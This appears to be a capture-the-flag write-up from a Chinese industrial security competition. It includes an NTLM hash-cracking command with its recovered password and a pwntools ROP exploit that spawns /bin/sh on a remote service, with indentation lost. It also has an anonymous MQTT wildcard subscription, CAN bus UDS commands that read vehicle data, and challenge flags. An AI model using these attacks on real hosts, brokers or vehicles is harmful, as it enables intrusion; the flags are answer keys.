第八届工业信息安全技能大赛-复赛-海口-day2
day2
信创
信息隐藏技术

sql

末尾是 768的数据过滤.
flag, key ,iv
key: abc123keyxyzzzzz
iv: test789@@@@@@@##
flagenc: 32e16caf6d5604c8850b87b7911aaf5e8bc3ce3c3c3a407c20f5236d4d8c8811
sm2
hashcat -m 5600 share::MicrosoftAccount:8084a9541cc21245:7127a5f398ce6ea22c45304a29b541ea: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 rockyou.txt --force --show
SHARE::MicrosoftAccount:8084a9541cc21245:7127a5f398ce6ea22c45304a29b541ea:0101000000000000f5dd10ae0260db015540912ea9f6e6960000000002001e00570049004e002d00340030004e0031004e003700470048004e003400380001001e00570049004e002d00340030004e0031004e003700470048004e003400380004001e00570049004e002d00340030004e0031004e003700470048004e003400380003001e00570049004e002d00340030004e0031004e003700470048004e003400380007000800f5dd10ae0260db0106000400020000000800300030000000000000000100000000200000b10540fd6d6790ab7ff69116128b6050ff3c2689d32ebafb5fc9d1d0db2cd2b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100300030002e003100330038000000000000000000:Smb_70017
密码为
Smb_70017
在 Wireshark 中配置 NTLMSSP,用该密码解密流量。

接下来是密码部分了。
import sympy
# 粘贴您之前提供的完整数据
private_shares = [
(1, 15812642359676786493606845678568048800710433801652020386501506042966805735881284394167217766278208743603220841792261625495583229134310971548398132224499185658311061918078392186572523270473085521053221032536305381560311382915293866374167863058731710335820117981795899343249166862629826954367474056157577993486832879919144907045940459528780913646828478208979844725307092460538195305727598173092368231431438625491082753510549015860905704598861888574803514144156020271888209476352108608175733391901745040829055585889723268707157741730231116273692255146896726911200368319315807643500970193081073092127545372335652757782022),
(2, 15798599849219342146152429401599546628430816865505189139236397554159159113600676210102937346555735620794569370873021098997521543067698077585969479256887377668715209871319787105704376646535803773885726758930839611696415719346625707232702056747886002123472609164331923724330558980562855237460623927456823819184944985357894498709565789142860339321340130673911627619887343611230679681365814652530932653150169284386162269476672862179232672142312293494130257611424830895850569582422906925981503147178080163549677461217839329623861103106387444637191880032259754372593560060372128951056350940014287374063566910692251925988721),
(3, 13057033804103451553428438123146792682198558142005791177364708836495945280389623989899523853838907650620998092194919036123274589007518258726663253830691992165446299958032205561572557998962165408576191362632712273328194522019629796279768060182856408281018695600520661222860315804375621246010828741287665953924429360532684832625019217053317402502962477652350293377788212982315983435898136088398642114016310859871490313314641790228979826864766224569461868053845372238484416612042950379531536992871607462112932992951107918625537074498869348137633575123458716303159988528811774055192343880807506626973490931605439943805392),
(4, 3159292735012776191774249580277914105845993529339616950204948939725736709673119175907302283258493852564666156583497967114351678932615684702337837135777224099501095386451940495983560614126671008749438807317741469308403389175443352924715385306968818284179806318212614048832584964370470147922244134716149201011437914631030237200235556433476853173208990920589373752397559244705912717298392500364787893063487665568861853941405951637931417890318845994442451657664668667273901544255280993305392025028582262121305894554922457929340616725324359536418015615692267584026282944723605398282770073786742886303871800452514400416245),
(5, 18343783504629888390960481508303295368537550193793558579547024470789188380773564525188289959014265123322750121321984614691222308425709362497936124567680236087147056845542105606255269212833849479488332684883125125680259131926552232316115739567532056340798897516509849350763058418365326650985340408243350833321507307998904848799056766288172993101286271293357165560710761815392841039099051081643043981676780145237004032232845726850676114515261097116174945658005824278268633483705935294250072773062047327363103325092958304256207085224134369817145785090482245385728482498385730844343642897937267998575956257863881025555377)
]
public_shares = [
(1, 6979332173900211202009550094851865830156787530697891899926708651225959896188603504756351594743253447871540385586641269789038521325172909708376541381241682134480073460199759252510309579407113939610532355435783742896318597158828262397945439257858593863145642442027368738513148730714392306520544113465207441235105451509683135283545471569145580127898990175485965058178802973463936524826755139614293322702928741579150523266841513917589444661600713746019558531378537818911846969559165620829467138611185343120378451849832311749648525887344582898480672406067612497991686272277938358236534519899227018827180846431352295756513),
(2, 2357094994429580955498536268169634947476866925154881557058293637118777820562671725426523284395676637808476148304309121494861967016564378249570844733312930038421305839335277226020761608017942942504314014759427784526496297458386758971228289126609092707172787038118407101635151068591776342566594608857122646170907069190964878481070435308244687593828453350709460657584417049068850967633317751404603253992419708797653068894924295151354518762218434829400665850538956381200439794211274084735346994130226641922420763661069586224357106745464080987397331072926995635605718179472165601517839174408888724258667409313839268971555),
(3, 21355161955976116577090166774570587090443773248981583429608090430549914213586367041120681146011267334330722163951611959244550749930138791178164729740203816331792710995834082177565109659158301237634613213588774550997246034581480940204745353063974891643355518877445589313398529657324842043819245056881243769533493829178501773035354516371865315535636084957291519526343302307013912025810821549169546324669992404973843409462355198586677507713055836737103177291991241905086410408979451753552090629815455195863079695698989484476981503839348953670198247535597294232976308738952388986656274477504721682372858821259261005413881),
(4, 14009108791330066614778294017540224412378598888945201582332590079301440706717573716547220577423663333105861145236675298090795090774359243912333791934456197054017122285036889694527624582756903682901379278016343315662968450162267304511088319804961266603054980677224540158959381530495374588651434840900591420566233902226664316506063006244283439244345706581792542570104175329053062291275051734665306291184309302060148062479853050029177487908741669245784076937091289730456898347503079387480056019826116609281163891122834918335603543724594206999865803914107531063628063914710686035624766738820200374793456860021673950745440),
(5, 9915949142943515183488651097529374125325219707856953738177897419226841615784960976630668164607875532119917629212294320609385522039809462184684727852744125256994226023715093595872673747713710167578390440070642493000715743428580045935360853212607120409756002903653446188750429627745689208019903962053343780921194002198697850549927959963735150219401439252465462576262429646259371323212338868622723875019003640875246509216463383658890877674510013975048716715896150926036805068890636041627618382359484787673404531459557135423941230827284466889476135182553190761681414433747308864543401766293871944787066709593196636912627)
]
def get_integer_poly_coeffs(shares):
    """Interpolate the polynomial through *shares* and return its coefficients.

    Builds the Lagrange interpolating polynomial with exact sympy arithmetic
    (no modular reduction is applied anywhere), expands it, and returns
    ``Poly.all_coeffs()``: the coefficients ordered from the highest degree
    down to the constant term.

    Args:
        shares: Sequence of ``(x, y)`` pairs; the x values are expected to be
            distinct, otherwise a basis denominator becomes zero.

    Returns:
        List of sympy numbers, constant term last.

    NOTE(review): despite the name, nothing here forces integer coefficients.
    The division by the basis denominator is exact rational arithmetic, so the
    result is integral only if the shares really lie on an integer polynomial
    of degree below ``len(shares)``. Presumably the challenge evaluated the
    sharing polynomial without reducing modulo a prime; confirm against the
    challenge source.
    """
    x = sympy.symbols('x')
    xs = [point[0] for point in shares]
    ys = [point[1] for point in shares]

    total = sympy.S(0)
    for i, (xi, yi) in enumerate(zip(xs, ys)):
        numerator = sympy.S(1)
        denominator = sympy.S(1)
        for j, xj in enumerate(xs):
            if j != i:
                # i-th Lagrange basis: product over j != i of (x - xj) / (xi - xj)
                numerator *= (x - xj)
                denominator *= (xi - xj)
        total += yi * (numerator / denominator)

    expanded = sympy.expand(total)
    return sympy.Poly(expanded, x).all_coeffs()
# --- Main attack logic ---
print("步骤 1: 正在为两组份额计算整数多项式...")
coeffs_private_full, coeffs_public_full = map(
    get_integer_poly_coeffs, (private_shares, public_shares)
)
# all_coeffs() lists coefficients from the highest degree down, so the last
# entry of each list is the constant term C0 = f(0).
C0_private, C0_public = coeffs_private_full[-1], coeffs_public_full[-1]
# NOTE(review): the message above announces "step 1", but the listing on this
# page ends after printing the two constant terms; later steps are not shown.
print(f'{C0_private=}')
print(f'{C0_public=}')
Snake
# coding=utf-8
import base64
from pwn import *
# Local binary under test and the remote service given in the write-up.
file_name = "./11111"
remote_host = "10.10.200.21"
remote_port = 57261

# pwntools context; statement order is kept as in the original listing.
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_name)
context.timeout = 1
context.os = 'linux'
context.log_level = "debug"

# No command-line argument: run the local binary. Any argument: connect to
# the remote service instead.
DEBUG = len(sys.argv) < 2
r = process([file_name]) if DEBUG else remote(remote_host, remote_port)
def info_addr(msg, addr):
    """Log *msg* followed by *addr* rendered as a hexadecimal string."""
    rendered = ": {0}".format(hex(addr))
    log.info(msg + rendered)
# Entry point: assembles a return-oriented chain and sends it, base64-encoded,
# to the process or remote connection held in `r`.
# NOTE(review): this listing lost its indentation on the page. The nesting
# below, in particular whether `else:` pairs with `if not DEBUG:` or with the
# `while` loop and where that branch ends, cannot be recovered from the text;
# confirm against the original script before relying on it.
if __name__ == '__main__':
# Hard-coded absolute gadget addresses.
# NOTE(review): fixed addresses like these presumably rely on the binary being
# loaded at a constant base (non-PIE); confirm with checksec. Building the
# target as PIE with stack protection would invalidate them.
pop_rdi = 0x00000000004006a6 # 0x00000000004006a6 : pop rdi ; ret
pop_rsi = 0x00000000004113f3 # 0x00000000004113f3 : pop rsi ; ret
pop_rax_rdx_rbx = 0x0000000000483396 # 0x0000000000483396 : pop rax ; pop rdx ; pop rbx ; ret
# Address the chain finally returns to; by its name, a `syscall` instruction.
syscall = 0x0000000000401dac
# Despite the name, the inline comment states this address holds the string "/bin/sh".
bss_addr = 0x0000000000493c9b # 0x0000000000493c9b : /bin/sh
if not DEBUG:
# Forward operator-typed input to the target and echo each reply until the
# operator enters '+'.
cmd = input()
while cmd != '+':
r.send(cmd)
print(r.recv().decode('utf-8'))
cmd = input()
else:
r.send(b'q')
r.recvuntil('bin/sh\n')
# 0x70 filler bytes followed by one 8-byte word; presumably these cover the
# vulnerable buffer and the saved frame pointer so that the next word lands on
# the saved return address (TODO confirm against the binary).
p = b'a' * (0x70)
p += p64(0xdeedbeef)
# rax = 0x3b (execve on x86-64 Linux), rdx = 0, rbx = 0 (filler for the extra pop).
p += p64(pop_rax_rdx_rbx)
p += p64(0x3b)
p += p64(0)
p += p64(0)
# rsi = 0
p += p64(pop_rsi)
p += p64(0)
# rdi = address of the "/bin/sh" string
p += p64(pop_rdi)
p += p64(bss_addr)
p += p64(syscall)
# The chain is base64-encoded and sent after a b'Y' prefix.
# NOTE(review): presumably the target base64-decodes this input into a
# fixed-size stack buffer without bounding the decoded length; that unchecked
# decode is the defect a fix would address (verify in the binary).
p = base64.b64encode(p)
r.sendline(b'Y' + p)
r.send(b'/')
r.interactive()
车路云
追踪 MQTT 幽灵指令
sudo apt install mosquitto-clients
# "#" is the MQTT multi-level wildcard, so this subscribes to every topic on the broker.
# No username/password or TLS options are passed; presumably the broker accepts
# anonymous clients and has no per-topic ACLs, which is what exposes the
# messages. Confirm against the broker configuration.
mosquitto_sub -h 10.10.200.12 -p 1883 -t "#"
# dk_flag{7CC57C74}
破解智能车钥匙的 NFC 防线
10cec1f5ccc6cbcdd19b9e9b939998999ed73a
先做 From Hex 解码,再进行异或。

Tbox
分析通信数据:
使用工具(如 Wireshark)打开 tbox_data.pcap,分析通信协议和加密方式。
确定通信是否使用了 Diffie-Hellman 密钥交换协议。
提取 Diffie-Hellman 参数:
从 dh_parameters.txt 中提取 Diffie-Hellman 的参数(如素数 $p$ 和生成元 $g$)。
如果通信中包含了 Diffie-Hellman 的公钥交换部分,提取双方的公钥。
破解共享密钥:
如果攻击者能够获取一方的私钥,可以利用 Diffie-Hellman 的公钥和参数计算出共享密钥。
如果私钥未知,可能需要尝试暴力破解或其他密码学攻击(如中间人攻击)。不过对已经抓取的离线流量,中间人攻击并不适用;只有在参数过弱(例如素数位数过小)时,才可能通过求解离散对数恢复私钥。
解密通信数据:
使用计算出的共享密钥解密通信数据。
提取隐藏的 Flag。
dk_flag{Vehicle telemetry: speed=60, fuel=40}
车窗报文获取
candump can0

dk_flag{091}
车辆故障数量读取
# UDS request to CAN ID 0x710: an ISO-TP single frame (length byte 0x03) carrying
# service 0x19 (ReadDTCInformation), sub-function 0x01, DTC status mask 0x03.
cansend can1 710#03190103
# Watch the same interface for the ECU's reply.
candump can1

在您提供的CAN总线消息中,第一条消息是请求消息,第二条消息是响应消息。我们将基于UDS(Unified Diagnostic Services)协议的标准来解析这些消息,并尝试从中提取车辆的故障数量。
请求消息解析
总线名称:can1
ID:710
数据长度:[4] 字节
数据:03 19 01 03
03:ISO-TP(ISO 15765-2)单帧的 PCI 字节,表示后面有 3 个有效数据字节(19 01 03)。
19:服务标识符(SID),表示这是一个诊断服务请求。在UDS中,19代表“读取DTC信息”。
01:子功能编号,表示请求的是“报告当前已存储的DTC数量”。
03:DTC 状态掩码(DTCStatusMask),是 19 01 子功能(reportNumberOfDTCByStatusMask)的必需参数,用于指定统计哪些状态位对应的 DTC;0x03 对应 testFailed 和 testFailedThisOperationCycle 两个状态位。
响应消息解析
总线名称:can1
ID:718
数据长度:[8] 字节
数据:06 59 01 FF 01 00 02 00
06:ISO-TP 单帧的 PCI 字节,表示后面有 6 个有效数据字节(59 01 FF 01 00 02),最后一个 00 是填充字节。
59:响应的服务标识符(SID),59是19服务的响应SID(19 + 40 = 59,在UDS中,响应SID是请求SID加40)。
01:子功能编号,与请求中的子功能编号匹配,表示这是对“报告当前已存储的DTC数量”请求的响应。
FF:DTC 状态可用掩码(DTCStatusAvailabilityMask),表示该 ECU 支持哪些状态位;这个字节不表示 DTC 数量。
01:DTC 格式标识符(DTCFormatIdentifier),0x01 表示 ISO 14229-1 DTC 格式。
00 02:这两个字节通常表示符合请求条件的DTC数量。在大多数UDS实现中,这两个字节组合起来表示一个16位的数值。
00 是高字节。
02 是低字节。
因此,将这两个字节组合起来,我们得到的是0x0002,即十进制的2。
结论
根据提供的响应消息,车辆的当前已存储的故障码(DTC)数量是2。请注意,这个解析基于UDS协议的标准理解和常见的实现方式,但具体的消息格式和含义可能会因不同的ECU制造商和车型而有所不同。
dk_flag{2}
车窗控制
点击小车车窗控制 candump can0

dk_flag{1E46321E}
车辆VIN读取
# UDS request to CAN ID 0x730: an ISO-TP single frame (length byte 0x03) carrying
# service 0x22 (ReadDataByIdentifier) for DID 0xF190, the standard VIN identifier.
cansend can1 730#0322F190
# NOTE(review): the request goes out on can1 but the capture runs on can0;
# confirm which interface actually carries the response.
candump can0



dk_flag{WYUZA1S2FEDK00001}
